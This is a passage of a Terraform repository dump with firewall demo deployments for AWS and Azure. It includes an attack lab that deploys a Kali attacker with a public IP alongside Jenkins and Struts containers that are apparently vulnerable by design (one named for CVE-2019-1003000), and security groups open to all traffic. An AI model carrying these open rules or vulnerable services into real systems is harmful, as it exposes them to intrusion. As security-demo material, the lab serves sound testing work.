 4 |   vpc_id      = "${aws_vpc.SDWAN.id}"
 5 | 
 6 |   ingress {
 7 |     from_port   = "0"
 8 |     to_port     = "0"
 9 |     protocol    = "-1"
10 |     cidr_blocks = ["0.0.0.0/0"]
11 |   }
12 | 
13 |   egress {
14 |     from_port   = "0"
15 |     to_port     = "0"
16 |     protocol    = "-1"
17 |     cidr_blocks = ["0.0.0.0/0"]
18 |   }
19 |   tags = {
20 |     Name = "allow-all"
21 |   }
22 | }


--------------------------------------------------------------------------------
/aws/sdwan-lab/terraform.tfvars:
--------------------------------------------------------------------------------
 1 | aws_region = "eu-west-1"
 2 | 
 3 | VPC-Name = "SDWAN01"
 4 | 
 5 | SD-WAN-HUB-FW = "ami-06eb7061108f6fcb7"
 6 | 
 7 | SD-WAN-HUB-SVR = "ami-04a91de248eab22ea"
 8 | 
 9 | SD-WAN-ROUTER-JITTER = "ami-0228a0bb61ce54230"
10 | 
11 | SD-WAN-BRANCH25-FW = "ami-06eb7061108f6fcb7"
12 | 
13 | SD-WAN-BRANCH50-FW = "ami-06eb7061108f6fcb7"
14 | 
15 | SD-WAN-BRANCH25-IWS = "ami-07e4d468a47905df3"
16 | 
17 | SD-WAN-BRANCH50-IWS = "ami-0738f0192b2fc93ea"
18 | 
19 | VPCCIDR = "100.64.0.0/16"
20 | 
21 | SD-WAN-MGT = "100.64.0.0/24"
22 | 
23 | SD-WAN-WAN1 = "100.64.1.0/24"
24 | 
25 | SD-WAN-WAN2 = "100.64.2.0/24"
26 | 
27 | SD-WAN-WAN3 = "100.64.3.0/24"
28 | 
29 | SD-WAN-WAN4 = "100.64.4.0/24"
30 | 
31 | SD-WAN-MPLS = "100.64.5.0/24"
32 | 
33 | SD-WAN-Branch25 = "100.64.25.0/24"
34 | 
35 | SD-WAN-Branch50 = "100.64.50.0/24"
36 | 
37 | SD-WAN-Hub = "100.64.255.0/24"
38 | 
39 | ServerKeyName = "AWS-Lab-Pair"
40 | 


--------------------------------------------------------------------------------
/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw1/authcodes:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw1/init-cfg.txt:
--------------------------------------------------------------------------------
 1 | type=dhcp-client
 2 | ip-address=
 3 | default-gateway=
 4 | netmask=
 5 | ipv6-address=
 6 | ipv6-default-gateway=
 7 | hostname=vmseries-fw1
 8 | panorama-server=
 9 | panorama-server-2=
10 | tplname=
11 | dgname=
12 | dns-primary=
13 | dns-secondary=
14 | op-command-modes=mgmt-interface-swap
15 | dhcp-send-hostname=yes
16 | dhcp-send-client-id=yes
17 | dhcp-accept-server-hostname=no
18 | dhcp-accept-server-domain=yes
19 | 


--------------------------------------------------------------------------------
/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw2/authcodes:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw2/init-cfg.txt:
--------------------------------------------------------------------------------
 1 | type=dhcp-client
 2 | ip-address=
 3 | default-gateway=
 4 | netmask=
 5 | ipv6-address=
 6 | ipv6-default-gateway=
 7 | hostname=vmseries-fw2
 8 | panorama-server=
 9 | panorama-server-2=
10 | tplname=
11 | dgname=
12 | dns-primary=
13 | dns-secondary=
14 | op-command-modes=mgmt-interface-swap
15 | dhcp-send-hostname=yes
16 | dhcp-send-client-id=yes
17 | dhcp-accept-server-hostname=no
18 | dhcp-accept-server-domain=yes
19 | 


--------------------------------------------------------------------------------
/aws/tgw_2fw_vpc_insertion/images/diagram.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/aws/tgw_2fw_vpc_insertion/images/diagram.png


--------------------------------------------------------------------------------
/aws/tgw_2fw_vpc_insertion/images/readme.md:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/aws/tgw_2fw_vpc_insertion/providers.tf:
--------------------------------------------------------------------------------
1 | provider "aws" {
2 |   version    = ">= 1.0.0"
3 |   region     = "${var.aws_region}"
4 | }
5 | 


--------------------------------------------------------------------------------
/aws/tgw_2fw_vpc_insertion_v12/README.md:
--------------------------------------------------------------------------------
1 | Test
2 | 


--------------------------------------------------------------------------------
/aws/tgw_inbound_asg-GovCloud/bootstrap_files/authcodes:
--------------------------------------------------------------------------------
1 |  
2 | 


--------------------------------------------------------------------------------
/aws/tgw_inbound_asg-GovCloud/bootstrap_files/init-cfg.txt:
--------------------------------------------------------------------------------
 1 | type=dhcp-client
 2 | ip-address=
 3 | default-gateway=
 4 | netmask=
 5 | ipv6-address=
 6 | ipv6-default-gateway=
 7 | dhcp-accept-server-hostname=yes
 8 | dns-primary=8.8.8.8
 9 | dns-secondary=4.2.2.2
10 | op-command-modes=mgmt-interface-swap
11 | 


--------------------------------------------------------------------------------
/aws/tgw_inbound_asg-GovCloud/bootstrap_files/nlb.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/aws/tgw_inbound_asg-GovCloud/bootstrap_files/nlb.zip


--------------------------------------------------------------------------------
/aws/tgw_inbound_asg-GovCloud/bootstrap_files/panw-aws.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/aws/tgw_inbound_asg-GovCloud/bootstrap_files/panw-aws.zip


--------------------------------------------------------------------------------
/aws/tgw_inbound_asg-GovCloud/diagram.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/aws/tgw_inbound_asg-GovCloud/diagram.png


--------------------------------------------------------------------------------
/aws/tgw_inbound_asg-GovCloud/modules/fw_in_asg/outputs.tf:
--------------------------------------------------------------------------------
1 | output "sqs_id" {
2 |   value = "${aws_sqs_queue.NetworkLoadBalancerQueue.id}"
3 | }
4 | 
5 | output "lb_dns_name" {
6 |   value = "${aws_lb.PublicLoadBalancer.dns_name}"
7 | }


--------------------------------------------------------------------------------
/aws/tgw_inbound_asg-GovCloud/modules/s3_bootstrap/outputs.tf:
--------------------------------------------------------------------------------
1 | output "completion" {
2 |   value = "${null_resource.dependency_setter.id}"
3 | }
4 | 
5 | output "bucket_name" {
6 |   value = "${aws_s3_bucket.bootstrap.id}"
7 | }


--------------------------------------------------------------------------------
/aws/tgw_inbound_asg-GovCloud/modules/s3_bootstrap/variables.tf:
--------------------------------------------------------------------------------
 1 | variable bucket_name {}
 2 | variable bucket_name_random {}
 3 | variable file_location {}
 4 | 
 5 | variable config {
 6 |   type    = "list"
 7 |   default = []
 8 | }
 9 | 
10 | variable content {
11 |   type    = "list"
12 |   default = []
13 | }
14 | 
15 | variable license {
16 |   type    = "list"
17 |   default = []
18 | }
19 | 
20 | variable software {
21 |   default = []
22 | }
23 | 
24 | variable other {
25 |   default = []
26 | }
27 | 


--------------------------------------------------------------------------------
/aws/tgw_inbound_asg-GovCloud/modules/vpc_in/outputs.tf:
--------------------------------------------------------------------------------
 1 | output "mgmt_id" {
 2 |   value = "${aws_subnet.mgmt.*.id}"
 3 | }
 4 | 
 5 | output "untrust_id" {
 6 |   value = "${aws_subnet.untrust.*.id}"
 7 | }
 8 | 
 9 | output "trust_id" {
10 |   value = "${aws_subnet.trust.*.id}"
11 | }
12 | 
13 | output "tgw_id" {
14 |   value = "${aws_subnet.tgw.*.id}"
15 | }
16 | 
17 | output "lambda_id" {
18 |   value = "${aws_subnet.lambda.*.id}"
19 | }
20 | 
21 | output "natgw_id" {
22 |   value = "${aws_subnet.natgw.*.id}"
23 | }
24 | 
25 | output "vpc_id" {
26 |   value = "${aws_vpc.main.id}"
27 | }
28 | 
29 | output "tgw_vpc_attachment_id" {
30 |   value = "${aws_ec2_transit_gateway_vpc_attachment.main.id}"
31 | }
32 | 
33 | output "default_security_group_id" {
34 |   value = "${aws_vpc.main.default_security_group_id}"
35 | }
36 | 
37 | output "untrust_route_table_id" {
38 |   value = "${aws_route_table.untrust.id}"
39 | }
40 | 


--------------------------------------------------------------------------------
/aws/tgw_inbound_asg-GovCloud/modules/vpc_in/variables.tf:
--------------------------------------------------------------------------------
 1 | variable tgw_id {}
 2 | variable tgw_rtb_id {}
 3 | variable region {}
 4 | variable cidr_vpc {}
 5 | 
 6 | variable azs {
 7 |   type = "list"
 8 | }
 9 | 
10 | variable cidr_mgmt {
11 |   type = "list"
12 | }
13 | 
14 | variable cidr_untrust {
15 |   type = "list"
16 | }
17 | 
18 | variable cidr_trust {
19 |   type = "list"
20 | }
21 | 
22 | variable cidr_lambda {
23 |   type = "list"
24 | }
25 | 
26 | variable cidr_tgw {
27 |   type = "list"
28 | }
29 | 
30 | variable cidr_natgw {
31 |   type = "list"
32 | }
33 | 
34 | variable tag {
35 |   default = "vmseries"
36 | }
37 | 


--------------------------------------------------------------------------------
/aws/tgw_inbound_asg-GovCloud/outputs.tf:
--------------------------------------------------------------------------------
1 | output "SQS-URL" {
2 |   value = "${module.fw_in.sqs_id}"
3 | }
4 | output "ELB-URL" {
5 |   value = "${module.fw_in.lb_dns_name}"
6 | }
7 | output "S3-BUCKET" {
8 |   value = "${module.s3_in.bucket_name}"
9 | }


--------------------------------------------------------------------------------
/aws/tgw_inbound_asg-GovCloud/variables.tf:
--------------------------------------------------------------------------------
 1 | provider "aws" {
 2 |   version = ">= 1.0.0"
 3 |   region  = "${var.region}"
 4 | }
 5 | 
 6 | variable tag {
 7 |   default = "fw-in"
 8 | }
 9 | 
10 | variable region {
11 |   default = "us-gov-west-1"
12 | }
13 | 
14 | variable key_name {
15 |   description = "Enter name of an existing EC2 key pair"
16 |   default     = "AWS-Lab-Pair"
17 | }
18 | 
19 | variable fw_ami {
20 |   description = "FW AMI - https://docs.paloaltonetworks.com/compatibility-matrix/vm-series-firewalls/aws-cft-amazon-machine-images-ami-list/images-for-pan-os-8-1.html"
21 |   default     = "ami-09553d68"
22 | }
23 | 
24 | variable fw_sg_source {
25 |   description = "Source prefix to apply to mgmt ENI"
26 |   default     = "0.0.0.0/0"
27 | }
28 | 
29 | variable tgw_id {
30 |   description = "Enter the ID of an existing TGW"
31 |   default     = "tgw-0123456789"
32 | }
33 | 
34 | variable tgw_rtb_id {
35 |   description = "Enter the ID of an existing TGW route table to associate with VPC attachment"
36 |   default     = "tgw-rtb-0123456789"
37 | }


--------------------------------------------------------------------------------
/aws/tgw_inbound_asg/bootstrap_files/authcodes:
--------------------------------------------------------------------------------
1 |  
2 | 


--------------------------------------------------------------------------------
/aws/tgw_inbound_asg/bootstrap_files/init-cfg.txt:
--------------------------------------------------------------------------------
 1 | type=dhcp-client
 2 | ip-address=
 3 | default-gateway=
 4 | netmask=
 5 | ipv6-address=
 6 | ipv6-default-gateway=
 7 | dhcp-accept-server-hostname=yes
 8 | dns-primary=8.8.8.8
 9 | dns-secondary=4.2.2.2
10 | op-command-modes=mgmt-interface-swap
11 | 


--------------------------------------------------------------------------------
/aws/tgw_inbound_asg/bootstrap_files/nlb.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/aws/tgw_inbound_asg/bootstrap_files/nlb.zip


--------------------------------------------------------------------------------
/aws/tgw_inbound_asg/bootstrap_files/panw-aws.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/aws/tgw_inbound_asg/bootstrap_files/panw-aws.zip


--------------------------------------------------------------------------------
/aws/tgw_inbound_asg/diagram.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/aws/tgw_inbound_asg/diagram.png


--------------------------------------------------------------------------------
/aws/tgw_inbound_asg/modules/fw_in_asg/outputs.tf:
--------------------------------------------------------------------------------
1 | output "sqs_id" {
2 |   value = "${aws_sqs_queue.NetworkLoadBalancerQueue.id}"
3 | }
4 | 
5 | output "lb_dns_name" {
6 |   value = "${aws_lb.PublicLoadBalancer.dns_name}"
7 | }


--------------------------------------------------------------------------------
/aws/tgw_inbound_asg/modules/s3_bootstrap/outputs.tf:
--------------------------------------------------------------------------------
1 | output "completion" {
2 |   value = "${null_resource.dependency_setter.id}"
3 | }
4 | 
5 | output "bucket_name" {
6 |   value = "${aws_s3_bucket.bootstrap.id}"
7 | }


--------------------------------------------------------------------------------
/aws/tgw_inbound_asg/modules/s3_bootstrap/variables.tf:
--------------------------------------------------------------------------------
 1 | variable bucket_name {}
 2 | variable bucket_name_random {}
 3 | variable file_location {}
 4 | 
 5 | variable config {
 6 |   type    = "list"
 7 |   default = []
 8 | }
 9 | 
10 | variable content {
11 |   type    = "list"
12 |   default = []
13 | }
14 | 
15 | variable license {
16 |   type    = "list"
17 |   default = []
18 | }
19 | 
20 | variable software {
21 |   default = []
22 | }
23 | 
24 | variable other {
25 |   default = []
26 | }
27 | 


--------------------------------------------------------------------------------
/aws/tgw_inbound_asg/modules/vpc_in/outputs.tf:
--------------------------------------------------------------------------------
 1 | output "mgmt_id" {
 2 |   value = "${aws_subnet.mgmt.*.id}"
 3 | }
 4 | 
 5 | output "untrust_id" {
 6 |   value = "${aws_subnet.untrust.*.id}"
 7 | }
 8 | 
 9 | output "trust_id" {
10 |   value = "${aws_subnet.trust.*.id}"
11 | }
12 | 
13 | output "tgw_id" {
14 |   value = "${aws_subnet.tgw.*.id}"
15 | }
16 | 
17 | output "lambda_id" {
18 |   value = "${aws_subnet.lambda.*.id}"
19 | }
20 | 
21 | output "natgw_id" {
22 |   value = "${aws_subnet.natgw.*.id}"
23 | }
24 | 
25 | output "vpc_id" {
26 |   value = "${aws_vpc.main.id}"
27 | }
28 | 
29 | output "tgw_vpc_attachment_id" {
30 |   value = "${aws_ec2_transit_gateway_vpc_attachment.main.id}"
31 | }
32 | 
33 | output "default_security_group_id" {
34 |   value = "${aws_vpc.main.default_security_group_id}"
35 | }
36 | 
37 | output "untrust_route_table_id" {
38 |   value = "${aws_route_table.untrust.id}"
39 | }
40 | 


--------------------------------------------------------------------------------
/aws/tgw_inbound_asg/modules/vpc_in/variables.tf:
--------------------------------------------------------------------------------
 1 | variable tgw_id {}
 2 | variable tgw_rtb_id {}
 3 | variable region {}
 4 | variable cidr_vpc {}
 5 | 
 6 | variable azs {
 7 |   type = "list"
 8 | }
 9 | 
10 | variable cidr_mgmt {
11 |   type = "list"
12 | }
13 | 
14 | variable cidr_untrust {
15 |   type = "list"
16 | }
17 | 
18 | variable cidr_trust {
19 |   type = "list"
20 | }
21 | 
22 | variable cidr_lambda {
23 |   type = "list"
24 | }
25 | 
26 | variable cidr_tgw {
27 |   type = "list"
28 | }
29 | 
30 | variable cidr_natgw {
31 |   type = "list"
32 | }
33 | 
34 | variable tag {
35 |   default = "vmseries"
36 | }
37 | 


--------------------------------------------------------------------------------
/aws/tgw_inbound_asg/outputs.tf:
--------------------------------------------------------------------------------
1 | output "SQS-URL" {
2 |   value = "${module.fw_in.sqs_id}"
3 | }
4 | output "ELB-URL" {
5 |   value = "${module.fw_in.lb_dns_name}"
6 | }
7 | output "S3-BUCKET" {
8 |   value = "${module.s3_in.bucket_name}"
9 | }


--------------------------------------------------------------------------------
/aws/tgw_inbound_asg/variables.tf:
--------------------------------------------------------------------------------
 1 | provider "aws" {
 2 |   version = ">= 1.0.0"
 3 |   region  = "${var.region}"
 4 | }
 5 | 
 6 | variable tag {
 7 |   default = "fw-in"
 8 | }
 9 | 
10 | variable region {
11 |   default = "us-east-1"
12 | }
13 | 
14 | variable key_name {
15 |   description = "Enter name of an existing EC2 key pair"
16 |  // default     = "my-key-pair"
17 | }
18 | 
19 | variable fw_ami {
20 |   description = "FW AMI - https://docs.paloaltonetworks.com/compatibility-matrix/vm-series-firewalls/aws-cft-amazon-machine-images-ami-list/images-for-pan-os-8-1.html"
21 |   // default     = "ami-a2fa3bdf"
22 | }
23 | 
24 | variable fw_sg_source {
25 |   description = "Source prefix to apply to mgmt ENI"
26 |  // default     = "0.0.0.0/0"
27 | }
28 | 
29 | variable tgw_id {
30 |   description = "Enter the ID of an existing TGW"
31 |  // default     = "tgw-0123456789"
32 | }
33 | 
34 | variable tgw_rtb_id {
35 |   description = "Enter the ID of an existing TGW route table to associate with VPC attachment"
36 |  // default     = "tgw-rtb-0123456789"
37 | }


--------------------------------------------------------------------------------
/aws/transitgateway-demo-v2/bootstrap_files/fw1/authcodes:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/aws/transitgateway-demo-v2/bootstrap_files/fw1/init-cfg.txt:
--------------------------------------------------------------------------------
 1 | type=dhcp-client
 2 | ip-address=
 3 | default-gateway=
 4 | netmask=
 5 | ipv6-address=
 6 | ipv6-default-gateway=
 7 | hostname=vmseries-fw1
 8 | panorama-server=
 9 | panorama-server-2=
10 | tplname=
11 | dgname=
12 | dns-primary=
13 | dns-secondary=
14 | op-command-modes=mgmt-interface-swap
15 | dhcp-send-hostname=yes
16 | dhcp-send-client-id=yes
17 | dhcp-accept-server-hostname=no
18 | dhcp-accept-server-domain=yes
19 | 


--------------------------------------------------------------------------------
/aws/transitgateway-demo-v2/bootstrap_files/fw2/authcodes:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/aws/transitgateway-demo-v2/bootstrap_files/fw2/init-cfg.txt:
--------------------------------------------------------------------------------
 1 | type=dhcp-client
 2 | ip-address=
 3 | default-gateway=
 4 | netmask=
 5 | ipv6-address=
 6 | ipv6-default-gateway=
 7 | hostname=vmseries-fw2
 8 | panorama-server=
 9 | panorama-server-2=
10 | tplname=
11 | dgname=
12 | dns-primary=
13 | dns-secondary=
14 | op-command-modes=mgmt-interface-swap
15 | dhcp-send-hostname=yes
16 | dhcp-send-client-id=yes
17 | dhcp-accept-server-hostname=no
18 | dhcp-accept-server-domain=yes
19 | 


--------------------------------------------------------------------------------
/aws/transitgateway-demo-v2/iam/lambda-assume-policy.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "Version": "2012-10-17",
 3 |   "Statement": [
 4 |     {
 5 |       "Action": "sts:AssumeRole",
 6 |       "Principal": {
 7 |         "Service": "lambda.amazonaws.com"
 8 |       },
 9 |       "Effect": "Allow",
10 |       "Sid": ""
11 |     }
12 |   ]
13 | }


--------------------------------------------------------------------------------
/aws/transitgateway-demo-v2/iam/variables.tf:
--------------------------------------------------------------------------------
 1 | variable "name" {
 2 |   description = "The name of the policy"
 3 |   default     = ""
 4 | }
 5 | 
 6 | variable "path" {
 7 |   description = "The path of the policy in IAM"
 8 | 
 9 |   default     = "/"
10 | }
11 | 
12 | variable "description" {
13 |   description = "The description of the policy"
14 | 
15 |   default     = "IAM Policy"
16 | }
17 | 
18 | variable "policy" {
19 |   description = "The path of the policy in IAM (tpl file)"
20 |   default     = ""
21 | }
22 | 


--------------------------------------------------------------------------------
/aws/transitgateway-demo-v2/lambda/lambda-combined.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/aws/transitgateway-demo-v2/lambda/lambda-combined.zip


--------------------------------------------------------------------------------
/aws/transitgateway-demo-v2/lambda/layer.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/aws/transitgateway-demo-v2/lambda/layer.zip


--------------------------------------------------------------------------------
/aws/transitgateway-demo-v2/providers.tf:
--------------------------------------------------------------------------------
1 | provider "aws" {
2 |   version    = ">= 1.0.0"
3 |   region     = "${var.aws_region}"
4 | }
5 | 


--------------------------------------------------------------------------------
/azure/Jenkins-sans-Panhandler/README.md:
--------------------------------------------------------------------------------
1 | Placeholder
2 | 


--------------------------------------------------------------------------------
/azure/Jenkins-sans-Panhandler/azure_vars.tf:
--------------------------------------------------------------------------------
 1 | variable "RG_Name" {}
 2 | variable "FW_SKU" {}
 3 | variable "PANOS_Version" {}
 4 | variable "Server_Version" {}
 5 | variable "Azure_Region" {}
 6 | variable "Admin_Username" {}
 7 | variable "Admin_Password" {}
 8 | variable "Bootstrap_Storage_Account" {}
 9 | variable "Storage_Account_Access_Key" {}
10 | variable "Storage_Account_Fileshare" {}
11 | variable "Storage_Account_Fileshare_Directory" {}
12 | variable "Web_Initscript_Path" {}
13 | variable "Attack_Initscript_Path" {}
14 | variable "Victim_CIDR" {}
15 | variable "Attack_CIDR" {}
16 | variable "Mgmt_Subnet_CIDR" {}
17 | variable "Untrust_Subnet_CIDR" {}
18 | variable "Trust_Subnet_CIDR" {}
19 | variable "AppGW_Subnet_CIDR" {}
20 | variable "Web_Subnet_CIDR" {}
21 | variable "Attack_Subnet_CIDR" {}
22 | variable "Firewall_Subnet_CIDR" {}
23 | variable "FW_Mgmt_IP" {}
24 | variable "FW_Untrust_IP" {}
25 | variable "FW_Trust_IP" {}
26 | variable "WebLB_IP" {}
27 | variable "Web_IP" {}
28 | variable "Attack_IP" {}
29 | 


--------------------------------------------------------------------------------
/azure/Jenkins-sans-Panhandler/bootstrap/init-cfg.txt:
--------------------------------------------------------------------------------
1 | dns-primary=8.8.8.8
2 | dns-secondary=8.8.4.4


--------------------------------------------------------------------------------
/azure/Jenkins-sans-Panhandler/kali-interfaces.tf:
--------------------------------------------------------------------------------
 1 | #### CREATE THE NETWORK INTERFACES ####
 2 | 
 3 | resource "azurerm_network_interface" "attacker" {
 4 | 	name								= "attacker"
 5 | 	location							= "${azurerm_resource_group.attackgroup.location}"
 6 | 	resource_group_name 				= "${azurerm_resource_group.attackgroup.name}"
 7 | 	ip_configuration {
 8 | 		name							= "eth0"
 9 | 		subnet_id						= "${azurerm_subnet.attacker.id}"
10 | 		private_ip_address_allocation 	= "Static"
11 |     private_ip_address = "${var.Attack_IP}"
12 | 		public_ip_address_id = "${azurerm_public_ip.attacker.id}"
13 | 	}
14 | 	depends_on = ["azurerm_public_ip.attacker"]
15 | }


--------------------------------------------------------------------------------
/azure/Jenkins-sans-Panhandler/kali-public-ips.tf:
--------------------------------------------------------------------------------
1 | #### CREATE PUBLIC IP ADDRESSES ####
2 | 
3 | resource "azurerm_public_ip" "attacker" {
4 | 	name                = "attacker"
5 | 	location			      = "${azurerm_resource_group.attackgroup.location}"
6 | 	resource_group_name	= "${azurerm_resource_group.attackgroup.name}"
7 | 	allocation_method   = "Static"
8 | }
9 | 


--------------------------------------------------------------------------------
/azure/Jenkins-sans-Panhandler/kali-rg-subnets.tf:
--------------------------------------------------------------------------------
 1 | # ********** RESOURCE GROUP **********
 2 | 
 3 | # Create a resource group
 4 | resource "azurerm_resource_group" "attackgroup" {
 5 | 	name		= "${var.RG_Name}-${random_pet.red_team.id}"
 6 | 	location	= "${var.Azure_Region}"
 7 | }
 8 | 
 9 | # ********** VNET **********
10 | 
11 | # Create a virtual network in the resource group
12 | resource "azurerm_virtual_network" "attack-vnet" {
13 | 	name				= "attack-vnet"
14 | 	address_space		= ["${var.Attack_CIDR}"]
15 | 	location			= "${azurerm_resource_group.attackgroup.location}"
16 | 	resource_group_name	= "${azurerm_resource_group.attackgroup.name}"
17 | }
18 | 
19 | #### CREATE THE SUBNETS ####
20 | 
21 | resource "azurerm_subnet" "attacker" {
22 |   name                 = "attacker"
23 |   resource_group_name  = "${azurerm_resource_group.attackgroup.name}"
24 |   virtual_network_name = "${azurerm_virtual_network.attack-vnet.name}"
25 |   address_prefixes     = ["${var.Attack_Subnet_CIDR}"]
26 | }
27 | 


--------------------------------------------------------------------------------
/azure/Jenkins-sans-Panhandler/kali-route-tables.tf:
--------------------------------------------------------------------------------
 1 | #### CREATE THE ROUTE TABLES ####
 2 | 
 3 | resource "azurerm_route_table" "attacker" {
 4 |   name                = "attacker"
 5 | 	location			      = "${azurerm_resource_group.attackgroup.location}"
 6 | 	resource_group_name	= "${azurerm_resource_group.attackgroup.name}"
 7 |   route {
 8 |     name           = "internet"
 9 |     address_prefix = "0.0.0.0/0"
10 |     next_hop_type  = "internet"
11 |   }
12 | }
13 | resource "azurerm_subnet_route_table_association" "attacker" {
14 |   subnet_id      = "${azurerm_subnet.attacker.id}"
15 |   route_table_id = "${azurerm_route_table.attacker.id}"
16 | }


--------------------------------------------------------------------------------
/azure/Jenkins-sans-Panhandler/outputs.tf:
--------------------------------------------------------------------------------
 1 | output "MGT-IP-FW-1" {
 2 |   value = "${azurerm_public_ip.fwmanagement.ip_address}"
 3 | }
 4 | 
 5 | output "NATIVE-DNS" {
 6 |   value = "${azurerm_public_ip.appgw1.fqdn}"
 7 | }
 8 | 
 9 | output "NGFW-DNS" {
10 |   value = "${azurerm_public_ip.appgw2.fqdn}"
11 | }
12 | 
13 | output "ATTACKER_IP" {
14 |   value = "${azurerm_public_ip.attacker.ip_address}"
15 | }
16 | 
17 | output "RG_Name" {
18 |   value = "${azurerm_resource_group.resourcegroup.name}"
19 | }
20 | 


--------------------------------------------------------------------------------
/azure/Jenkins-sans-Panhandler/provider.tf:
--------------------------------------------------------------------------------
1 | # Configure the Providers
2 | provider "azurerm" {
3 |     features {}
4 | }
5 | 
6 | resource "random_pet" "red_team" {}
7 | 
8 | resource "random_pet" "blue_team" {}
9 | 


--------------------------------------------------------------------------------
/azure/Jenkins-sans-Panhandler/scripts/initialize_attacker.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | apt-get update
 3 | apt-get update
 4 | apt install docker.io python3-pip build-essential libssl-dev libffi-dev docker-compose -y --force-yes
 5 | cd /var/tmp
 6 | echo "version: '2'" > docker-compose.yml
 7 | echo "services:" >> docker-compose.yml
 8 | echo "  attacker:" >> docker-compose.yml
 9 | echo "    image: pglynn/kali-azure:latest" >> docker-compose.yml
10 | echo "    ports:" >> docker-compose.yml
11 | echo "      - \"443:443\"" >> docker-compose.yml
12 | echo "      - \"5000:5000\"" >> docker-compose.yml
13 | docker-compose up -d
14 | 


--------------------------------------------------------------------------------
/azure/Jenkins-sans-Panhandler/scripts/initialize_jenkins.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | apt-get update
 3 | apt-get update
 4 | apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes
 5 | pip3 install docker-compose
 6 | cd /var/tmp
 7 | echo "version: '3'" > docker-compose.yml
 8 | echo "services:" >> docker-compose.yml
 9 | echo "  jenkins:" >> docker-compose.yml
10 | echo "    image: her0ma/cve-2019-1003000" >> docker-compose.yml
11 | echo "    ports:" >> docker-compose.yml
12 | echo "      - \"50000:50000\"" >> docker-compose.yml
13 | echo "      - \"8080:8080\"" >> docker-compose.yml
14 | docker-compose up -d
15 | 


--------------------------------------------------------------------------------
/azure/Jenkins-sans-Panhandler/scripts/initialize_kali.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | apt-get update
 3 | apt-get update
 4 | apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes
 5 | pip3 install docker-compose
 6 | cd /var/tmp
 7 | echo "version: '3'" > docker-compose.yml
 8 | echo "services:" >> docker-compose.yml
 9 | echo "  attacker:" >> docker-compose.yml
10 | echo "    image: pglynn/kali-rolling:latest" >> docker-compose.yml
11 | echo "    ports:" >> docker-compose.yml
12 | echo "      - \"443:443\"" >> docker-compose.yml
13 | docker-compose up -d
14 | 


--------------------------------------------------------------------------------
/azure/Jenkins-sans-Panhandler/scripts/initialize_struts.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | apt-get update
 3 | apt-get update
 4 | apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes
 5 | pip3 install docker-compose
 6 | cd /var/tmp
 7 | echo "version: '3'" > docker-compose.yml
 8 | echo "services:" >> docker-compose.yml
 9 | echo "  struts:" >> docker-compose.yml
10 | echo "    image: pglynn/apache-struts2-demo:latest" >> docker-compose.yml
11 | echo "    ports:" >> docker-compose.yml
12 | echo "      - \"8080:8080\"" >> docker-compose.yml
13 | docker-compose up -d


--------------------------------------------------------------------------------
/azure/Jenkins-sans-Panhandler/scripts/initialize_webserver.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | apt-get update
 3 | apt-get update
 4 | apt install docker.io python3-pip build-essential libssl-dev libffi-dev docker-compose -y --force-yes
 5 | cd /var/tmp
 6 | echo "version: '2'" > docker-compose.yml
 7 | echo "services:" >> docker-compose.yml
 8 | echo "  jenkins:" >> docker-compose.yml
 9 | echo "    image: pglynn/jenkins:latest" >> docker-compose.yml
10 | echo "    environment:" >> docker-compose.yml
11 | echo "      JAVA_OPTS: \"-Djava.awt.headless=true\"" >> docker-compose.yml
12 | echo "      JAVA_OPTS: \"-Djenkins.install.runSetupWizard=false\"" >> docker-compose.yml
13 | echo "    ports:" >> docker-compose.yml
14 | echo "      - \"50000:50000\"" >> docker-compose.yml
15 | echo "      - \"8080:8080\"" >> docker-compose.yml
16 | docker-compose up -d
17 | 


--------------------------------------------------------------------------------
/azure/Jenkins_proj-master/.gitignore:
--------------------------------------------------------------------------------
1 | .venv
2 | terraform.tfstate
3 | .terraform
4 | Pipfile*
5 | .pipenv_init_done


--------------------------------------------------------------------------------
/azure/Jenkins_proj-master/WebInBootstrap/azure_vars.tf:
--------------------------------------------------------------------------------
1 | variable "RG_Name" {}
2 | variable "Azure_Region" {}
3 | 


--------------------------------------------------------------------------------
/azure/Jenkins_proj-master/WebInBootstrap/bootstrap.tf:
--------------------------------------------------------------------------------
 1 | resource "random_id" "storage_account" {
 2 |   byte_length = 2
 3 | }
 4 | resource "azurerm_storage_account" "bootstrap" {
